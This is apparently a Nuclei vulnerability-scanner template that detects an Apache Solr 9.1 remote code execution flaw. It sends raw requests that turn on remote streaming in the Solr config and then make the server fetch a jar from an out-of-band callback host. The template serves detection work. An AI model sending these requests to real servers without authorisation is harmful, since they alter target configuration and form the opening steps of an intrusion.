id: apache-solr-rce

info:
  name: Apache Solr 9.1 - Remote Code Execution
  author: j4vaovo
  severity: critical
  description: Apache Solr 9.1 is vulnerable to RCE.
  reference:
    - https://web.archive.org/web/20230414152023/https://noahblog.360.cn/apache-solr-rce/
  metadata:
    max-request: 2
  tags: solr,apache,rce,oast,intrusive

http:
  - raw:
      - |
        POST /solr/gettingstarted_shard1_replica_n1/config HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json

        {  "set-property" : {"requestDispatcher.requestParsers.enableRemoteStreaming":true}}
      - |
        POST /solr/gettingstarted_shard2_replica_n1/debug/dump?param=ContentStreams HTTP/1.1
        Host: {{Hostname}}
        Content-Type: multipart/form-data; boundary=------------------------5897997e44b07bf9

        --------------------------5897997e44b07bf9
        Content-Disposition: form-data; name="stream.url"

        jar:http://{{interactsh-url}}/test.jar?!/Test.class
        --------------------------5897997e44b07bf9--

    matchers-condition: and
    matchers:
      - type: word
        part: interactsh_protocol
        words:
          - "http"

      - type: word
        part: interactsh_request
        words:
          - "User-Agent: Java"
# digest: 4a0a00473045022100897ee52b1523cde044e6b25f2437b5f7d386d64b902e02cee87019aabd3dcd0f022052ca8c69a5cb7b9a67c76a56d3ec1494e0af1392717f642ad6c41e1e786fb484:922c64590222798bb761d5b6d8e72950